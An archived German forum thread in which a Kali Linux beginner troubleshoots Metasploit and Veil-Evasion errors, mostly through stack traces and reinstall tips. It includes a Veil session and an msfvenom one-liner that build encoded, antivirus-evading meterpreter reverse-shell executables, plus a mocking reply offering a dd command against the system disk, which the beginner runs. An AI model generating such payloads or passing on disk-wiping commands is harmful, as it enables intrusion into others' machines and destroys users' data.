PDA

Archiv verlassen und diese Seite im Standarddesign anzeigen : Metasploit lässt sich nach VEIL Installation nicht mehr starten?!



WolvenClaw
26.10.2016, 22:00
Hallo,
ich habe mir mal VEIL zum crypten von PAYLOADS auf meinem Kali Linux Betriebsystem installiert und jetzt startet das Metasploit-Framework Fenster nicht mehr... Es kommt folgender Fehler:

root@kali:~# msfconsole
/usr/lib/ruby/2.3.0/openssl.rb:13:in `require': /usr/lib/i386-linux-gnu/ruby/2.3.0/openssl.so: symbol SSLv2_method, version OPENSSL_1.0.2d not defined in file libssl.so.1.0.2 with link time reference - /usr/lib/i386-linux-gnu/ruby/2.3.0/openssl.so (LoadError)
from /usr/lib/ruby/2.3.0/openssl.rb:13:in `<top (required)>'
from /usr/share/metasploit-framework/vendor/bundle/ruby/2.3.0/gems/bcrypt-3.1.11/lib/bcrypt.rb:9:in `require'
from /usr/share/metasploit-framework/vendor/bundle/ruby/2.3.0/gems/bcrypt-3.1.11/lib/bcrypt.rb:9:in `<top (required)>'
from /usr/share/metasploit-framework/lib/metasploit/framework.rb:9:in `require'
from /usr/share/metasploit-framework/lib/metasploit/framework.rb:9:in `<top (required)>'
from /usr/share/metasploit-framework/lib/metasploit/framework/database.rb:1:in `require'
from /usr/share/metasploit-framework/lib/metasploit/framework/database.rb:1:in `<top (required)>'
from /usr/share/metasploit-framework/lib/metasploit/framework/parsed_options/base.rb:17:in `require'
from /usr/share/metasploit-framework/lib/metasploit/framework/parsed_options/base.rb:17:in `<top (required)>'
from /usr/share/metasploit-framework/lib/metasploit/framework/parsed_options/console.rb:2:in `require'
from /usr/share/metasploit-framework/lib/metasploit/framework/parsed_options/console.rb:2:in `<top (required)>'
from /usr/share/metasploit-framework/vendor/bundle/ruby/2.3.0/gems/activesupport-4.2.7.1/lib/active_support/inflector/methods.rb:263:in `require'
from /usr/share/metasploit-framework/vendor/bundle/ruby/2.3.0/gems/activesupport-4.2.7.1/lib/active_support/inflector/methods.rb:263:in `const_get'
from /usr/share/metasploit-framework/vendor/bundle/ruby/2.3.0/gems/activesupport-4.2.7.1/lib/active_support/inflector/methods.rb:263:in `block in constantize'
from /usr/share/metasploit-framework/vendor/bundle/ruby/2.3.0/gems/activesupport-4.2.7.1/lib/active_support/inflector/methods.rb:259:in `each'
from /usr/share/metasploit-framework/vendor/bundle/ruby/2.3.0/gems/activesupport-4.2.7.1/lib/active_support/inflector/methods.rb:259:in `inject'
from /usr/share/metasploit-framework/vendor/bundle/ruby/2.3.0/gems/activesupport-4.2.7.1/lib/active_support/inflector/methods.rb:259:in `constantize'
from /usr/share/metasploit-framework/vendor/bundle/ruby/2.3.0/gems/activesupport-4.2.7.1/lib/active_support/core_ext/string/inflections.rb:66:in `constantize'
from /usr/share/metasploit-framework/lib/metasploit/framework/command/base.rb:73:in `parsed_options_class'
from /usr/share/metasploit-framework/lib/metasploit/framework/command/base.rb:69:in `parsed_options'
from /usr/share/metasploit-framework/lib/metasploit/framework/command/base.rb:47:in `require_environment!'
from /usr/share/metasploit-framework/lib/metasploit/framework/command/base.rb:81:in `start'
from /usr/bin/msfconsole:48:in `<main>'

Kann mir jemand helfen?

LG

D3MEN
27.10.2016, 03:35
HAst du denn schon nal versucht es neu zu installieren ?

Alucart
27.10.2016, 10:28
1. apt-get remove metasploit-framework
2. apt-get install metasploit-framework
3. apt-get install ruby
4. apt-get install openssl
5. cd /usr/share/metasploit-framework# bundle install
6. Profit.

PS: Wird bestimmt auch laufen wenn du nur alleine openssl installierst aber ich würde alles neu drauf machen damit keine Fehler entstehen

Starflow
27.10.2016, 11:41
Bevor du blindlings alles neu installierst versuch mal die development libs für ruby zu installieren.


sudo apt-get install ruby-dev

WolvenClaw
27.10.2016, 21:41
Danke schonmal für alle Antworten! Metasploit funktionier wieder nur will VEIL jetzt nicht einen payload generieren es kommt immer eine Error Meldung....

---------- Post added at 22:41 ---------- Previous post was at 21:12 ----------


Bevor du blindlings alles neu installierst versuch mal die development libs für ruby zu installieren.


sudo apt-get install ruby-dev




Die Commands vom Autor über Ihnen haben etwas geholfendoch nun kann VEILkeine PAYLOADS mehr erstellen...

Braz
28.10.2016, 07:44
Wieso nicht, gibts einen Errorlog?

VG,
Braz

WolvenClaw
28.10.2016, 12:41
Wieso nicht, gibts einen Errorlog?

VG,
Braz

Payload: python/shellcode_inject/aes_encrypt loaded


Required Options:

Name Current Value Description
---- ------------- -----------
COMPILE_TO_EXE Y Compile to an executable
EXPIRE_PAYLOAD X Optional: Payloads expire after "Y" days ("X" disables feature)
INJECT_METHOD Virtual Virtual, Void, Heap
USE_PYHERION N Use the pyherion encrypter

Available Commands:

set Set a specific option value
info Show information about the payload
options Show payload's options
generate Generate payload
back Go to the main menu
exit exit Veil-Evasion

[python/shellcode_inject/aes_encrypt>>]: generate

================================================== =======================
Veil-Evasion | [Version]: 2.28.2
================================================== =======================
[Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
================================================== =======================

[?] Use msfvenom or supply custom shellcode?

1 - msfvenom (default)
2 - custom shellcode string
3 - file with shellcode (raw)

[>] Please enter the number of your choice:


Press [enter] for windows/meterpreter/reverse_tcp

Press [tab] to list available payloads
[>] Please enter metasploit payload:
[>] Enter value for 'LHOST', [tab] for local IP: 192.168.2.108
[>] Enter value for 'LPORT': 4455
[>] Enter any extra msfvenom options (syntax: OPTION1=value1 or -OPTION2=value2):


Generating shellcode...
Traceback (most recent call last):
File "./Veil-Evasion.py", line 339, in <module>
controller.MainMenu(args=args)
File "/root/Veil/Veil-Evasion/modules/common/controller.py", line 875, in MainMenu
self.outputFileName = self.PayloadMenu(self.payload, args=args)
File "/root/Veil/Veil-Evasion/modules/common/controller.py", line 801, in PayloadMenu
payloadCode = payload.generate()
File "/root/Veil/Veil-Evasion//modules/payloads/python/shellcode_inject/aes_encrypt.py", line 51, in generate
Shellcode = self.shellcode.generate(self.required_options)
File "/root/Veil/Veil-Evasion/modules/common/shellcode.py", line 501, in generate
FuncShellcode = subprocess.check_output(settings.MSFVENOM_PATH + self.msfvenomCommand, shell=True)
AttributeError: 'module' object has no attribute 'MSFVENOM_PATH'
root@kali:~/Veil/Veil-Evasion#

Braz
28.10.2016, 12:47
AttributeError: 'module' object has no attribute 'MSFVENOM_PATH'

Schau mal ob msfvenom ohne Veil als standalone läuft.

WolvenClaw
28.10.2016, 13:03
Schau mal ob msfvenom ohne Veil als standalone läuft.

Wie könnte ich das überprüfen?

Braz
28.10.2016, 13:36
https://www.sans.org/security-resources/sec560/misc_tools_sheet_v1.pdf
Siehe Punkt msfvenom.

WolvenClaw
28.10.2016, 13:46
https://www.sans.org/security-resources/sec560/misc_tools_sheet_v1.pdf
Siehe Punkt msfvenom.
Ich habe einfach mal den Command msfvenom -l encoders eingegeben zum testen und dabei kam das raus:

Framework Encoders
==================

Name Rank Description
---- ---- -----------
cmd/echo good Echo Command Encoder
cmd/generic_sh manual Generic Shell Variable Substitution Command Encoder
cmd/ifs low Generic ${IFS} Substitution Command Encoder
cmd/perl normal Perl Command Encoder
cmd/powershell_base64 excellent Powershell Base64 Command Encoder
cmd/printf_php_mq manual printf(1) via PHP magic_quotes Utility Command Encoder
generic/eicar manual The EICAR Encoder
generic/none normal The "none" Encoder
mipsbe/byte_xori normal Byte XORi Encoder
mipsbe/longxor normal XOR Encoder
mipsle/byte_xori normal Byte XORi Encoder
mipsle/longxor normal XOR Encoder
php/base64 great PHP Base64 Encoder
ppc/longxor normal PPC LongXOR Encoder
ppc/longxor_tag normal PPC LongXOR Encoder
sparc/longxor_tag normal SPARC DWORD XOR Encoder
x64/xor normal XOR Encoder
x64/zutto_dekiru manual Zutto Dekiru
x86/add_sub manual Add/Sub Encoder
x86/alpha_mixed low Alpha2 Alphanumeric Mixedcase Encoder
x86/alpha_upper low Alpha2 Alphanumeric Uppercase Encoder
x86/avoid_underscore_tolower manual Avoid underscore/tolower
x86/avoid_utf8_tolower manual Avoid UTF8/tolower
x86/bloxor manual BloXor - A Metamorphic Block Based XOR Encoder
x86/bmp_polyglot manual BMP Polyglot
x86/call4_dword_xor normal Call+4 Dword XOR Encoder
x86/context_cpuid manual CPUID-based Context Keyed Payload Encoder
x86/context_stat manual stat(2)-based Context Keyed Payload Encoder
x86/context_time manual time(2)-based Context Keyed Payload Encoder
x86/countdown normal Single-byte XOR Countdown Encoder
x86/fnstenv_mov normal Variable-length Fnstenv/mov Dword XOR Encoder
x86/jmp_call_additive normal Jump/Call XOR Additive Feedback Encoder
x86/nonalpha low Non-Alpha Encoder
x86/nonupper low Non-Upper Encoder
x86/opt_sub manual Sub Encoder (optimised)
x86/shikata_ga_nai excellent Polymorphic XOR Additive Feedback Encoder
x86/single_static_bit manual Single Static Bit
x86/unicode_mixed manual Alpha2 Alphanumeric Unicode Mixedcase Encoder
x86/unicode_upper manual Alpha2 Alphanumeric Unicode Uppercase Encoder

msf >

Braz
28.10.2016, 14:10
msfvenom -p windows/meterpreter/reverse_tcp -i 5 -e x86/shikata_ga_nai -fexe LHOST=10.1.1.1 LPORT=4444 > mal.exe

Try this.

WolvenClaw
28.10.2016, 15:18
Try this.
Ich habe den Command mal ausprobiert also er hat es auch fertig gestellt... Muss ich den Payload jetzt mit Veil irgendwie in Verbindung bringen? Oder bei Veil etwas anderes auswählen?

Braz
28.10.2016, 18:51
ok, dann liegts nicht an msfvenom.
Deinstallier einfach Veil und installiere es nochmal, dann sollte es wieder funktionieren.

WolvenClaw
28.10.2016, 21:46
ok, dann liegts nicht an msfvenom.
Deinstallier einfach Veil und installiere es nochmal, dann sollte es wieder funktionieren.

Gibt das da einen guten Command für? Weil apt-get remove Veil oder Veil-Evasion klappt net

Vr3piz4
28.10.2016, 22:03
# dd if=/dev/null of=/dev/sda - in deinem Fall das Beste.

(Blind commands ausfuehren ohne Ahnung zu haben ist dumm btw.)

WolvenClaw
28.10.2016, 22:17
# dd if=/dev/null of=/dev/sda - in deinem Fall das Beste.

(Blind commands ausfuehren ohne Ahnung zu haben ist dumm btw.)
Entschuldigung aber ich bin noch nicht so lange mit Kali Linux vertraut... ich bin auch nur hier um zu lernen.... Auf jeden Fall kommt bei mir diese Meldung wenn ich den Command eintippe:



root@kali:~# dd if=/dev/null of=/dev/sda
0+0 Datensätze ein
0+0 Datensätze aus
0 Bytes (0 B) kopiert, 0.000218696 s, 0.0 kB/s
root@kali:~#

Vr3piz4
28.10.2016, 22:32
Mit meiner Anmerkung wollte ich eigentlich noch mehr hervorheben, dass man diesen Command nicht ausfuehren soll.

kont
29.10.2016, 18:34
apt-get install openssl
sollte funktionieren